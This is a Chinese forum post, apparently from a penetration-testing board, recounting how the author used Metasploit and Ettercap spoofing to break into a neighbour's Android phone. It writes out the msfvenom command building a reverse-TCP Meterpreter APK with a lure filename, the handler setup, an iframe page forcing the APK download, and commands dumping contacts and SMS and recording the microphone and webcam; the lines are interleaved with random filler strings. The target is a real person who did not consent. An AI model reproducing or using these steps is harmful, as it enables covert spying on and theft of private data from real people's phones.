找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1612|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& d J+ V) c7 _" H& J" i 五、msf+ettercap入侵邻居安卓手机 5 k, V: A0 Z( ^' c( f, B+ j1 A

2 [: g7 D* t/ |) Y1 G% }# Y

4 J: N7 q- t0 ?- r2 n 首先启动msf 2 B: b, T: ^( a" a" _" w% o$ Z

/ T9 M1 l& `& m X; t+ R1 j; T

% I4 g; V6 u% q0 w 先用kali生成一个安卓木马,如下命令: % P& Q* q+ p$ Q) _& W

- j4 B9 |' J$ c q* C$ ]

8 Z7 H( n e! ~/ I8 t; E Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 7 o: s- A' L3 \ s$ O

$ W8 x) [7 w6 I. [, d

: F8 A/ k+ X1 l* b. Y+ B8 ^ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 - Y% L" _' a) }8 W" Z) ~% R

, h3 o9 A+ r3 c! }$ C

5 d; @1 v4 j1 n$ q 然后进入msf 4 y5 u, O1 `5 i# \7 O W. i5 l, i

& E A3 M* p5 i" ^% N( [

5 M1 O; B" |7 c8 h0 I8 `9 @ x use exploit/multi/handler ! O0 g4 i0 c9 S) t. Q( P: T z

' g$ O; N( |2 }% ]9 D ]

& h* m4 G, H1 N* ] set payload android/meterpreter/reverse_tcp * A$ X1 w3 E7 A/ f! k

0 h1 _8 Y9 W' F1 y$ X4 g) h

. d6 B8 a6 o" K8 T3 b( [ set LHOST 192.168.0.109 //ipkailiip * O* b% L" H# S: O+ a

; _* _! [- G' s) @

7 U D( s" f# x6 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 " q% f9 }( N8 Z" [( S

6 F* V2 S! T- V4 ^6 D* }' i

; O: K5 v% C5 |5 [, u f. I Exploit ! x6 h4 Z" i5 A. i: j1 z

+ v* ^3 ^0 [. O" |. k

2 n/ W! C$ [9 a& \/ c   2 f3 A& R0 x# s7 {

1 T$ u7 ]7 o- e- w X9 @7 k% g6 r4 o; C

( L9 _& @5 b- \- m. L; F$ A0 r 下面我们开启ettercap -G 0 m4 e. m9 [% P. r1 K0 z$ h

# B9 l4 H2 K8 U8 Q; L( K

, M* T/ e9 [! O* B 我物理IP # o- b( A3 i' V- a3 p- T

8 d/ i, }* p7 H" l2 F

) n% r& h8 f5 Y- y* [! g   8 _& w& R! J) o

" S2 ?" f; a# }" T

& P7 k* W, Y1 @# M 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, - X* _; ~$ L# n* B

* e) r- L5 N: i# M3 M! B# J' X. {0 T

# L) h4 h) Y6 X" d" e/ X 下面我们来设置一下 ' X6 t3 R9 ], w* d5 i; |

9 T" q+ C7 w2 i) [1 s0 N) N2 Q7 y( E

( A: U7 |! S b4 V# L3 O   ( q! z+ s" ], m/ {3 p

& P1 j2 n% I% n: \/ U0 T

: o; }2 i' }2 |1 ~3 Y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, G2 _8 ]: R& g- i: k0 l2 U' c

& P9 d! ]5 U) e) @1 p

9 q7 g: X- o$ _ @0 H: p* [   % B h W- @$ Q* j& s* c

B# W) S) P7 u% P4 w

6 Z9 j/ P# M; z7 X$ t! \   7 M1 r, m3 N3 j+ }$ ]

0 O6 ?$ B/ ?' d! }" t) H2 M }9 m

( E, E0 ?" c. z% c: W! r. w   * f1 ~ D6 V+ W

+ B$ M( o- x9 |3 g3 r' {4 d: L+ d1 a

$ R3 E3 g9 G& j, s6 t   0 B5 u3 Q t: x

/ ^5 T9 q6 y" |6 H2 [* `

: [8 z; n$ `$ c   1 D+ x3 {9 o# P7 W

( s {) L4 }2 C( |1 I$ L

0 a" L( C) q+ k' V   - }. U% C+ q+ T6 \# G: f6 k

! Z2 x# L( x0 O. w0 Z

7 s8 v; A' z" L" U9 S   1 ~3 e+ J) h, e4 `# U$ Q j: I7 S

( x3 Q+ D* O# T8 c1 R U# e; z

! Z/ ? y' D& E- U8 @; G3 [   9 {& p. d3 L5 B2 D7 G

3 V% z9 ~) d+ A9 |" ?; k

* r( m8 B- A! I   ; m: K3 w# x# E, }

9 g. k, {3 u; C9 C2 ?' E1 l

) u3 ^% k3 a/ ?5 S$ I) e# `   2 Q0 {9 D9 h5 B% Z8 h* s: y% K E

: M$ s# Q3 W. o7 X7 |7 T

: t" }: x8 q @, m   1 z* v( R. Z; i6 ~. Q. a& u& b3 B$ k

. o" f5 f7 q1 \* b

. m4 W3 p* \! f   - A& F: p1 p- u2 `5 y, ]+ v

) b5 r$ {/ e; p8 e$ d

, A% H7 {8 R& X   - D% V$ F& _9 o- |

2 A! l' f g! W M/ O# d$ i1 Q

0 G- C4 r+ b% Z& a 下面我们开始攻击 % n$ t0 K3 _7 N

% t9 M7 d: a2 N: t1 y# {

' g2 b$ O- a! Y. O7 O# Y   0 a! Y1 ~; Z1 O6 N! K% o! ^

: q; u" m: E! O) z: U

2 ?$ ~9 R' a- z0 I3 l   % p/ G7 \) h3 l2 S$ r

5 k, x! ?6 B5 n/ n( a) n1 E

2 k$ T9 M2 q) V! [& [   5 t$ A6 c, |9 ~% Y/ a

8 W |! _; F' f' f' S

) J, W' @" [9 l' k6 D   . X9 ?$ b, Y0 D B8 F

( Q8 T7 l! ~: D8 W) ^

# ^+ }. H) m# s   / F4 J* T0 K0 O9 y5 U$ F& m

- Z0 ~, j8 X" m7 E

8 M% w6 j3 X# |9 i 大概过了5分钟多,发现反弹成功了 - E6 g) p: t: Q$ j, P2 D5 @

. o, I# u% L. D! \4 T

$ A) y, d, U) ]7 k4 Q p   % t0 A4 w& e' L7 v; y

( X* b! z% M4 i; M: y, W3 S- J

6 e- y2 N' x9 ]- b& |   + ]; b, C4 l# C$ V$ r8 B4 r

/ Q' x) i0 Y) F

+ c; I r! Y. ~$ E/ W$ v' |9 }   - A; n; F4 q+ } a& O

; c" L3 ^; n' f- j

7 t' D& v! i. k# J3 ?   ! `) i; z+ R- b5 B7 L- o

2 |) w3 g9 J# E* p' g# {: S0 g& m

' j- \" @! ~! E" i8 ?   / W. J: \9 X( j/ W* j+ V( ^7 b

- J o/ B' T5 j: O# [

# V3 Z4 M4 D6 ]! g4 N! v   5 p0 v) |" F; i

. C" g1 r" s% G) C$ N0 u, g

^. f: A1 {, }9 B/ f, L   7 Y6 `) e' C4 o3 G" s$ r

) c( Q9 U# x3 t' ^: d3 A4 h

: s; L7 w* o6 V$ H2 Y 执行命令 3 z1 F* b' y: b! d# C" D; D, P

! {5 F. p1 `4 G

* S1 E4 P# O& h: v! ?; Y6 }6 n   - P. r% e5 i5 @! n% i% N

1 z) _6 |! L( p4 Z# L

) V6 q; N6 a# q1 P5 P2 u dump_contacts    --》这个是导出电话 ' j. q! V+ N8 p$ n4 c4 e, U+ o

4 d) |* r/ Y0 C8 X/ v0 D' Y

( c" C0 T( a9 `+ ~4 [ dump_sms --》这个是导出信息 " _2 t8 V, D/ f7 ^; E, T

0 k$ z8 m! X5 C, @3 }

' U }, K* `7 ^ record_mic     Record audio from the default microphone for X seconds * I+ N. a* ^/ j1 w

1 }7 a/ ~% E! b, ]3 R

7 U6 g0 I5 d! M# `     webcam_chat    Start a video chat ' j7 c; [2 ]% h* O* T7 V- u

6 ]9 W: g9 B Y0 a! Q `. |

+ `2 B# {9 q$ P# h: L     webcam_list    List webcams ) {9 ?+ J) w; f8 }+ I$ x7 ]

& ~4 t N4 g, L. k( D! g

- n( t3 C1 L4 J     webcam_snap    Take a snapshot from the specified webcam 7 x4 V/ y& l0 P5 h: R& f6 J* u

( f* S7 N6 G8 Z" H. i) U

# b7 u) n3 q2 @* ?& g webcam_stream  lay a video stream from the specified webcam , g4 p+ V( t/ E2 w1 k% }) ]5 `+ p

: C4 U( L! A' Q3 Z( Z

9 [( k8 _+ }& E; Z5 E( c( ^   1 ~! b! o( M/ b7 ]

+ {% C3 I7 j$ {2 h

2 U& K+ ^% I% \) L% l2 C: ^" V! {   f, H2 o8 Y* [# i, T

$ O1 ]( z( x& C" @$ V/ J

`! J9 r; v+ N# z- I% B, a 我们打开看一下电话薄, . x0 R9 N$ g! z& N- N

) |5 n" o: ]( m

_4 ^6 t& X3 R! d   5 l( l2 Y& T6 x3 S' l

# r) p9 u! U2 k

5 X% G3 T* [8 l   6 z. Q o3 g2 H* a: V- V

8 z4 Z6 c; D3 a& B$ C$ U

Z8 ?3 j U% s: `! V+ z( \2 g   7 m2 l. g: S0 Z2 P8 g

5 O; \% p- X% v7 m! r# Z

9 ?& f( `( H8 Q3 I: t   ! q+ H0 Q% O$ g) {% D

1 O' k, ~7 m9 F3 \: X9 \/ R

$ d$ }- P8 z# d" y# [7 `. ~1 r1 v   " X9 a/ p2 D3 J2 z6 F( H- V. Y

/ E: u) d1 {' A9 W* b) _' ~

, D' x+ \: h+ a- ]+ m. a# U) _   & v/ f& V6 D2 \! I! z

/ l6 E6 n) R! J3 J

8 T" G+ |! N, S) d" D! t3 v* y8 q1 t 我们同时欺骗成DroidJack木马,使用方法如图: 0 y/ N9 i$ c" k/ u! e. j

* M. ]1 J" i i$ x7 Q9 Y/ J1 Y" G/ v

1 M- D! h a& ?% q5 T, r5 \2 |/ i   # y+ ], b* k6 G6 [0 b9 [2 i, \

8 O$ A* b9 _9 i* R7 n- o

+ M. Q% ]5 C8 [ I: O   ! Y$ A; j' n6 r

7 {. d. e9 u7 ^, b! ^

' E7 ~( A, l0 e6 D) m1 {   ! n& L; b: L/ A3 R

$ [: ~2 t; g4 m0 x ?/ F. ?

! e8 j* S2 v/ T$ W 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 ~" g) e* s: z! q% Y

8 [; v8 G, ?6 `! F

% l8 s0 _; I' @; D' P   4 `" u6 X) n& P. v6 U1 a

+ K l# r0 c: y) i

& P' j- U2 \2 R+ y   - I$ S7 V I/ Q+ ]# T8 o: ~

5 @8 Q( z4 Y. ]/ ]! H

6 W* |9 S, E# o; F   ! T! Z$ B1 B( D

) _! i/ n: j* K3 V. D9 H% Z# Z2 j

6 j5 K+ ~6 d. T; [. k) U/ f9 W% w * E' W; l+ a$ D2 p

! k4 e1 ]4 L" w7 a6 _: J, ^' B* | [

4 S* ?# r1 n: }% E) c
0 t$ a2 b) a8 [* A8 _: x

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表